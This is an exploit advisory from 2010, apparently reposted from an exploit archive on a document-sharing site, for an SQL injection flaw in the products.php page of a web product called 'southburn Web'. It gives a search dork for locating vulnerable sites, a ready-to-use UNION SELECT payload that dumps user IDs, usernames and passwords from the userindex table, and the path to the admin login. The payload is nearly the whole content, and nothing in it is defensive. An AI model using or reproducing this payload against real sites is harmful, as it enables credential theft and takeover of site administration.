southburn Web products.php Sql Injection Vulnerability

Document Sample
southburn Web products.php Sql Injection Vulnerability Powered By Docstoc
					                           southburn Web products.php Sql Injection Vulnerability                                 Page 1/1
  1    ####################################################################
  2    .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
  3    .:. Team : Sec Attack Team
  4    .:. Home : www.sec−attack.com/vb
  5    .:. Script : southburn Web [http://southburn.ca/]
  6    .:. Bug Type : Sql Injection[Mysql]
  7    .:. Dork : "Powered by: Southburn"
  8
  9    ####################################################################
  10
  11   ===[ Exploit ]===
  12
  13   www.site.com/products.php?id=null[Sql]&r=null
  14
  15   www.site.com/products.php?id=null’+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,
       10,11,12,13,14,15,16+from+userindex−− −&r=null
  16
  17   Exploit:
  18
  19   ’+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userind
       ex−− −
  20
  21   Path admin:
  22
  23   www.site.com/admin/index.php
  24   ####################################################################




AtT4CKxT3rR0r1ST                                                                                                   02/13/2010

				
DOCUMENT INFO